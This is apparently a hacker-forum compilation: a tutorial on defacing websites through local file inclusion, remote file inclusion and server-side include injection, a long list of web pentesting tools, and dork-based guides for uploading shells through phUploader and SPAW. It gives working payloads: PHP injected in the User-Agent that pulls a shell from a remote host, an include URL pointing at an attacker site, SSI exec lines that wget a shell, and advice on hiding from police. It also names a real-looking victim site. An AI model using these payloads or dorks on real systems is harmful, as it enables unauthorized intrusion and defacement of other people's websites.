Advanced Exploitation Techniques

Table of Contents
Chapter I: Recon
Chapter II: Getting the tools ready
Chapter III: Getting your ass safe
Chapter IV: Local File Inclusion
Chapter V: Remote File Inclusion
Chapter VI: Server Side Inclusion
Chapter VII: Last word


Chapter I: Recon

Allright imagine this: "You are a NAVY seal, ready to strike Osama binladens House. But.... you havent prepared any strategy, plan, you havent found any flaw in the house its security. I bet you could tell me whats going to happen with the mission. COMPLETE FAILURE.
Always plan, plan and dont forget... Plan. Let me explain you briefly what i mean with planning. The art of planning is basicly gathering information about your target. The information i always collect is: The OS, The CMS it is running, Are there any open ports?. Then after i have gathered that information i usually perform a paros Proxy scan on the site. Basicly all it does is, scan the site for vulnerabilities and make up an fancy report.
If you want to download and use Paros for yourself be my guest.
Allright now.. I assume that you have the following information:
Any idea which ports are open on the target, The Operating System, The possible CMS the server is running (not necessary) and Your Paros Proxy report. Thats basicly all the information you need to determine which kind of attack you are going to use against the target.

Chapter II: Tools

Like every job there is, you will need tools.
We hackers have a very small ammount of tools necessarry to complete our main goal. Which is exploiting that one website you wish to deface.
Allright troughout this tutorial we are not going to use fancy tools etc.
Instead we will be using these key tools: -Your brain, -Your hands and last but certainly not least.... Firefox.
Make sure that you have either http headers or tamperdata installed as a firefox plugin.


Chapter III: Safey

In a world, where people hack targets you have another group of people. I bet you feel this comming.... The police.
Trust me on this one, once you start hacking big sites. The police will try to get your ass. But not when we are around. We can outsmart the police by using a VPN. VPN stands for Virtual Private Network. Basicly its a server you can connect to, which will intercept all your packets and make them go trough their server. All that it does is hide your real IP.
Some free VPN's are: Cyberghost, VPNreactor and nProx.
Once you move on to the bigger sites, i would highly recommend to get a paid VPN like vpntunnel or anonine.


Chapter IV: Local File Inclusion

Most of you have probally heard about this method once or twice. This is the so called "LFI" exploitation method.
LFI can occur on sites with this extension:

Code:

http://site.com/index.php?page=

When you perform an LFI attack you attempt to bypass the server directories to end up into the proc/self/environ directory. This can be done with ../../../proc/self/environ or if the ../. Useless you say? WELL i couldnt disagree more with you on that one. You see on the first sight proc/self/environ seems like a bunch of shit.
It will look something like this:

Code:

TMPDIR=/var/chroot/home/content/23/8340423/tmpPHPRC=/var/chroot/home/content/23/8340423/htmlTEMP=/var/chroot/home/content/23/8340423/tmpPHP_FCGI_CHILDREN=0PATH=/usr/local/bin:/usr/bin:/binPWD=/web/cgi-binSHLVL=0RAILS_ENV=productionSPI=TRUETMP=/var/chroot/home/content/23/8340423/tmpPHP_FCGI_MAX_REQUESTS=100000

But there is something really cool we can do with this.
We can spawn a shell trough this directory...
Now i got your attention right? Good. To spawn a shell we simply open up our tamper data en reload the page while we are tampering.
Once you see a little message pop up, click tamper data.
Now we will notice a little Useragent tab.
In there we will type the following code:

PHP Code:

<?php $file = fopen("shellname.php","w+"); $stream = fopen ("Link you shell here/shell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>

Thanks to Legit for that code. Works beter then mine with system();
Now once you have done that, click the submit button and your shell should be spawned . To check if it worked go to http://site.com/shell.php and voila.


Chapter V: Remote File Inclusion

Im not very glad to say, but this is one of the good exploit methods that has died. There are almost no websites who have this vulnerability. Thats because its so easy to fix and yet so harmfull.
I will explain you the so called "RFI" briefly.
RFI or remote file inclusion is an technique where you exploit the include(); function.
RFI and LFI are quite similair, there's a catch tho. "Remote" refers to using an external site to upload your shell and "Local" refers to uploading your shell using the same site.
For an example: a site includes php scripts in an un-protected manner.
A little bit like this:

PHP Code:

<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
include( $color . '.php' );
?>

Now to exploit this we will execute the following command:

Code:

http://site.com/index.php?page=http://yourevilsite.com/shell.txt

Now you are wondering.. why the hell did he use a .txt shell?
PHP automaticly transfers .txt > .php. which will result in a nice shell to own/deface the website.

Chapter VI: Server Side Inclusion

Okay now we move on to the "harder" methods.
Server Side Inclusion or SSI is an advanced technique that exploits vulnerabilities in the HTML code.
All that this means is that you inject script into html-forms and that it will result in spawning a shell or doing something worse.
SSI can only be performed in a few pages. Only pages with .shtml and .shtm are affected by this. These pages are 100% injectable. There is a something else to keep in mind. SSI will also work in normal pages, but ONLY when the input is not filtered.
For an example we have a little textbox which is vulnerable to SSI.
We can do some nice little commands here for an example:

Code:

< !--#exec cmd="cd \admin\dir">
< !--#exec cmd="wget http://www.yoursite.com/youknowwutthisis.txt" -->

i will explain these 2 commands to you for a moment.
The first command lets you browse directories that you cant acces without administrator priveleges. The second command lets you download your shell on the website (This is the shit we are interested in).
Then the only thing left for you to do is to locate your file by executing this command:

Code:

< !--#exec cmd="cp folderlocation/shellname.txt folderlocation/yourshellname.php" -->
This basicly finds your shell.txt, converts it to PHP and places it in the directory of your choice.

Chapter VII: Last things

Well this was my little tutorial regarding uncommon forms of attack.
I hope you have learned something from it and i hope to hear your personal experiences with this.
If this helped you, please leave any form of thank you. Its highly apreciated

VAPT Tools

                       Vulnerability Assessment And Penetration Testing Tools

VAPT:  Vulnerability Assessment And Penetration TestingVulnerability assessment is a process in which the IT systems such as computers and networks, and software such as operating systems and application software are scanned in order to indentify the presence of known and unknown vulnerabilities. As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists. Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases. VAPT can be performed in the following nine-step process: Scope: While performing assessments and tests, the scope of the assignment needs to be clearly defined. The scope is based on the assets to be tested. The following are the three possible scopes that exist Black Box Testing: Testing from an external network with no prior knowledge of the internal networks and systems Gray Box Testing: Testing from an external or internal network, with knowledge of the internal networks and systems. This is usually a combination of black box testing and white box testing White Box Testing: Performing the test from within the network with the knowledge of the network architecture and the systems. This is also referred to as internal testing Information Gathering The process of information gathering is to obtain as much information as possible  about the IT environment such as networks, IP addresses, operating system version, etc. This is applicable to all the three types of scope as discussed earlier. Vulnerability Detection In this process, tools such as vulnerability scanners are used, and vulnerabilities are identified in the IT environment by way of scanning. Information Analysis and Planning This process is used to analyze the identified vulnerabilities, combined with the information gathered about the IT environment, to devise a plan for penetrating into the network and system Penetration Testing In this process, the target systems are attacked and penetrated using the plan devised  in the earlier process. Privilege Escalation After successful penetration into the system, this process is used to identify and  escalate access to gain higher privileges, such as root access or administrative access  to the system. Result Analysis This process is useful for performing a root cause analysis as a result of a successful compromise to the system leading to penetration, and devise suitable recommen- dations in order to make the system secure by plugging the holes in the system. Reporting All the findings that are observed during the vulnerability assessment and penetration testing process need to be documented, along with the recommendations, in order to produce the testing report to the management for suitable actions. Cleanup Vulnerability assessment and penetration testing involves compromising the system, and during the process, some of the files may be altered. This process ensures that the system is brought back to the original state, before the testing, by cleaning up  (restoring) the data and files used in the target machines.

FIMAP

FIMAP is a Local and Remote file inclusion auditing Tool (LFI/RFI).
Fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection.  

Download 

---

ZAProxy v1.3.0 – Integrated Penetration Testing Tool

ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.
ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
Main Features-->>
Intercepting Proxy, Automated scanner,  Passive scanner, Brute Force, scanner, Spider, Fuzzer, Port scanner, Dynamic SSL certificates, API, Beanshell integration.

Download ZAP v1.3.0
Windows Installer – ZAP_1.3.0_Windows.exe
Linux Installer – ZAP_1.3.0_Linux.tar.gz

---

Burp Suite Free Edition v1.4 –
Web Application Security Testing Tool

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Download Burp Suite Free Edition v1.4
burpsuite_v1.4.zip    

---

Acunetix Web Vulnerability Scanner
Acunetix Web Vulnerability Scanner includes many innovative features:

1. AcuSensor Technology
2. An automatic client script analyzer allowing for security testing of Ajax and Web 2.0 applications.
3. Industries' most advanced and in-depth SQL injection and Cross site scripting testing.
4. Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer.
5. Visual macro recorder makes testing web forms and password protected areas easy
6. Support for pages with CAPTHCA, single sign-on and Two Factor authentication mechanisms.
7. Extensive reporting facilities including VISA PCI compliance reports.
8.Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease.
9. Intelligent crawler detects web server type and application language.
11. Acunetix crawls and analyzes websites including flash content, SOAP and AJAX.
12. Port scans a web server and runs security checks against network services running on the server.Download Trial Edition

DirectoryScanner: Directory Server fingerprinting Tool

DirectoryScanner is the FREE Firectory Server fingerprinting tool. It can help you to remotely detect the type of Directory dervers (such as Microsoft Active Directory,Novell eDirectory etc) running on the local network as well as Internet.

Also it can be used in Penetration testing while evaluating client environments where multiple Directory servers are deployed.

In addition to this, it can greatly help administrators to remotely keep tab on Directory Servers running in their network. At a time you can use it to scan single or multiple systems in the network.

It is helpful to perform a quick audit on network and gather information for further analysis.

It can detect following popular directory Servers:

• Novell eDirectory
• Microsft Active Directory
• Open LDAP Directory
• Sun One Directory
• Netscape Directory
• IBM Lotus Domino
• Oracle Directory

Download DirectoryScanner from here: Download

Pentesting Tools Used for Web Vulnerability Assessment

1. w3af

w3af or Web Application Attack and Audit Framework is an open source penetration testing tool for finding web vulnerabilities and an exploit tool that comes with cool plugins like sqlmap, xssBeef, and davShell. w3af automatically updates itself every time you launch the tool making it a very reliable tool for website hacking.  For more information just check out their website hosted at SourceForge.

2. Acunetix Web Vulnerability Scanner

Acunetix WVS or Web Vulnerability Scanner is a pentesting tool for Windows users so that they may be able to check for SQL Injection, Cross Site Scripting (XSS), CRLF injection, Code execution, Directory Traversal, File inclusion, checks for vulnerabilities in File Upload forms and other serious web vulnerabilities. You can download this tool here.

3. SQLninja

SQLninja is a an sql injection tool for web applications that use Microsoft SQL Server as its back-end though it runs only in Linux, Mac and BSD. It requires perl modules; NetPacket, Net-Pcap, Net-DNS, Net-RawIP, and IO-Socket-SSL. You can download this tool here.

4. Nikto

Nikto is an open source web server scanner “which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files or CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers." The good thing about Nikto is that it easy to use and and performs scanning faster. Nikto is coded in Perl and written by Chris Sullo and David Lodge. Although not all checks are really a big security problem but most are like XSS (Cross Site Scripting) Vulnerabilities, phpmyadmin logins, etc. Nikto alerts and gives you security tips in order to prevent your website from various attacks.

5. SQLmap

SQLmap is an open source automatic SQL injection and database takeover tool that fully supports MySQL, Oracle, PostgreSQL and Microsoft SQL Server. It partially supports Microsoft Access, DB2, Informix, Sybase and Interbase. Download sqlmap here.


6. Pangolin 3.2.3

Pangolin is another sql injection scanner for web applications using Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, Sqlite3, and Sybase. Its features include keyword auto analysis, supports HTTPS, has bypass firewall setting, injection digger, data dumper, etc. You can download its zip file here. 

7. Havij v1.15 Advanced SQL Injection

Havij is another famous automatic sql injection tool that has a free and premium version. The free version only supports a few injection methods like MsSQL 2000/2005 with error, MsSQL 2000/2005 no error union based, MySQL union based, MySQL Blind, MySQL error based, MySQL time based, Oracle union based, MsAccess union based, and Sybase (ASE). It also includes an admin finder and an md5 cracker. 


8. SQL Power Injector 

SQL Power Injector is a web pentesting application created in .Net 1.1 that helps the penetration tester and hackers find and exploit SQL injections on a web application that uses SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant, but it is possible to use it with any existing Database Management System when using the inline injection or normal mode. You can download the latest version of this tool which includes a Firefox plugin here.

9. VulnDetector

VulnDetector is a project coded in python which scans a website and detects various web based security vulnerabilities in the website. It was developed by Brad Cable who is into coding open source tools. You can download the script here.

10. SQLIer 0.8.2b

SQLIer is another project of Brad Cable and is a shell script that determines all the necessary information to build and exploit an SQL Injection vulnerability to a URL by itself without user interaction unless it can't guess the table or field names for the database correctly. SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites. Download the shell script here.

11. bsqlbf-v2

bsqlbf-v2 or Blind Sql Injection Brute Forcer version 2 is a perl script that allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. It supports MySQL, Oracle, PostgreSQL and Microsoft SQL Server databases. You can download the perl script on a Google hosted project.

12. Marathon Tool 

Marathon Tool is an alpha release SQL Injection tool or project that extracts information from web applications using Microsoft SQL Server, Microsoft Access, MySQL or Oracle Databases by using Time-Based Blind SQL Injection attack. The alpa release can be found here.

13. XSSer 

XSSer or Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. It also includes a GUI interface by using the command : ./xxser --gtk. You can download xxser's beta version here.

14. ASP Auditor v2.2

ASP Auditor v2.2 is a an auditing tool for ASP that sends initial probe request, path discovery request, ASP.NET validate discovery request, ASP.NET Apr/07 XSS Check, application trace request, and null remoter service request. By using the opt command -bf, it allows you to brute force ASP.NET version using JS Validate directories.

15.Absinthe

"Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection.    This tool does not aid in the discovery of SQL Injection holes but speeds up the process of data recovery." It supports Microsoft SQL Server, MSDE, Oracle, and Postgres and the tool runs on Linux, Windows and Mac OSX. Download here.

16. SQID

SQID or SQL injection digger is a command line tool written in ruby by Metaeye Security Group that looks for SQL injections and common errors in web sites. It performs a Google search when finding for SQL injections and common errors in web site URLs and crawls a webpage. You can download this tool by checking out its project SVN:

svn checkout svn://rubyforge.org/var/svn/sqid 

17.DarkMySQLi

DarkMySQLi is a multi purpose MySQL Injection tool coded in python which is also available for BackTrack 5 as one of its packed tools.

18. fimap 

fimap is an automatic LFI/RFI scanner and exploiter coded in python by Iman Karim. It allows a pentester to scan a single URL for File inclusion errors, scan a list of URLS for File Inclusion errors, scan Google search results for FiIe inclusion errors, and harvest all links of a webpage with recurse level of 3 and write the URLs to a file directory.

19.Script Hex Dump – Forensic Tool

Script Hex Dump - Forensic Tool is a java application that helps you in parsing your scripts like PHP and automatically converts it as a hex value, some penetration testers use this to test for possible sql injection vulnerability in a website. SQL Injection attack has been a chronic threat especially for those websites running PHP and MySQL as the backend of their database server, one of its capability if the server is not properly configure is the command for writing arbitrary files. You can download this toolhere.

20. PHP Vulnerability Hunter

PHP Vulnerability Hunter is a PHP web application fuzzer that scans for common vulnerabilities like local file inclusion, SQL Injection, full path disclosure, arbitrary command execution and many more. A good tool for analyzing your own web server. You can grab the new version of this tool here which is 1.1.4.6.

21. WSTOOL : Web vulnerable scan tool

WATOOL is a server error and SQL Injection, XSS or Cross Site Scripting scanner which uses PHP Check up collate with HTML FORM and LINK. You can download this tool here.

22. ProjectX WHMCS Pentesting Tool v.1

Projectx WHMCS Pentesting Tool v.1 is a vulnerability scanner coded in VB.NET that uses a black box approach. It echos the db_username and the db_password of a website that is vulnerable to WHMCS Local File Disclosure. This kind of vulnerability is only applicable to versions 3.x.x and some 4.x.x which was a viral exploit last year that some website administrators took for granted. You can download the tool here.

23. Wpscan 

WPscan or Wordpress Security Scanner is a pentesting tool written in ruby for Wordpress installations. The tools is coed by Ryan Dewhurst which uses a black box approach in finding security holes for Wordpress like timthumb, easy to guess passwords, plugin holes, etc. You can download wpscan here.

24. Skipfish

Skipfish is an active web application security reconnaissance tool written by Michal Zalewski. Skipfish spiders a URL using the wordlists, a very powerful web scanning tool with a simple implementation. It also scans for vulnerabilities like php injection, XSS, format string vulnerabilities, overflow vulnerabilities, file inclusions , etc. You can download this tool here.


25. WhatWeb

WhatWeb is a web scanner coded by Andrew Horton aka urbanadventurer from Security-Assessment.com. It is used for information gathering because it identifies content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries, servers, etc. You can download this tool here.

26. OWASP ZAP 

Zed Attack Proxy (ZAP) is a project of OWASP which is a GUI penetration testing tool for finding website vulnerabilities and flaws. This open source tool includes features like  intercepting proxy, active scanner, passive scanner, brute force scanner, spider, fuzzer, port scanner,  dynamic SSL certificates, API, and Beanshell integration. For more information about this tool, check out their website.

27.  Webshag

Webshag is a multi-threaded, multi-platform web server auditing tool coded in python. It is used for crawling a URL, port scanning, file fuzzing and audits your website. You can download this security auditing tool here.

28. OWASP DirBuster

DirBuster is another project of OWASP that a multi threaded java application designed to brute force directories and files names on web/application servers that uses a black box approach for application testing by trying to find hidden content. You can download this tool here.

29. Grendel-Scan

Grendel-Scan is free and open source web application pentesting tool that has an automatic scanning feature which detects common web application vulnerabilities, and features geared at aiding manual penetration tests. Get this tool now.

30. Mopest

Mopest is a PERL Local PHP Vulnerability Scanner for exploits PhpBB 2.0.20 Disable Administrator, PhpBB 2.0.19 Denial of Service - Infinitely topic, phpBB 2.0.15 Database Authentication Details, Invision Power Board 2.0.2 Multipl Users DoS, Invision Power Board 2.1.5 Code Execution, MyBB 1.0 RC4 Sql injection, MyBB 1.1.3 Create An Admin, MyBB Sql Injection, and WordPress 1.5.11 Sql Injection. It also has tools like Fake Mailer, Email Bomber, and MD5 Cracker.  You can check out this project here.

31. SecuBat

SecuBat is another web vulnerability scanner which automatically analyzes web sites with the aim of finding exploitable SQL injection and XSS vulnerabilities. You can check this tool here.

32. Arachni

Arachni is an open source web application security scanner framework coded in ruby that helps website administrators and penetration testers evaluate the security of a web application. Arachni asks you for the URL of the target and it automatically performs a simple scan and presents you with its findings which could be a very risky flaw or loophole. You can download this tool here.

33. WebSlayer


WebSlayer is another OWASP project that slays your web application by brute forcing the GET and POST parameters, checking the directories, brute forcing the login forms, fuzzing, brute forcing sessions, Ntml brute forcing, and many more. For more information of this project just check this site.

34. Burp Suite

Burp Suite is penetration testing tool and integrated platform for website security. Burp Suite has cool features like an intercepting proxy, application spider for crawling, detects numerous web application vulnerabilities, repeater tool, allows you to write your own plugins, and many more. The free edition is available for download here.

35. ProxMon


ProxMon is not a Digimon but a Python based open source framework that automates web application tests. Its key features include:

- automatic value tracing of set cookies, sent cookies, query strings and post parameters across sites,
- proxy agnostic
- included library of vulnerability checks
- active testing mode
- cross platform
- easy to program extensible python framework

You can download this tool here.

phUploader Remote File Upload Vulnerability

Title: phUploader Remote File Upload Vulnerability


Google Dork : intitle:Powered By phUploader 

Go to Google.com and enter this DOrk, see serach results 
Exploit URL : 
http://{site.comt}/ path/upload.php
 or 
http://site.com/upload.php


select any website and upload your file there 
website allow to upload .jpg .png .gif anf .png files only
anyway you can upload your deface in .jpg and mirrOr website like 
zone-h accept it as defcaement, if want to upload a shell then upload as 
shell.php.jpg
after uploading your file you'll got a message 
Your file(s) have been uploaded!


see the Link Below this message For view Your uploaded File


Live Demo ~ http://humortshirtzone.com/phUploader.php
Uploaded File ~ http://www.humortshirtzone.com/uploads/1321616908.jpg

spaw : Deface and Shell Upload Vunerablity

Spaw is a Vunerablity, you Can Upload your deface & Shell Easily in Vunerable websites







Lets Start


open www.google.com
enter The Dork inurl:"spaw2/dialogs/"
or
 inurl:"spaw2/uploads/files/"
You will Got results Like this "Index of/ spaw2/dialogs/" 
or : site.com/abc/spaw2/uploads/files/abc/abc.pdf

Now replace The Spaw2/Uploads/abc/abc ur with this url

for example i got this website  

 
so Now i will replcae 

with

Now the URL is



Now you will Got a window like this (click to see)


if you want to Upload deface page then Select files option ... and i f you want to upload shellthen select image option and upload your shell as shell.php;,jpg
see You uploaded deface here 


www.site.com/profile/spaw2/uploads/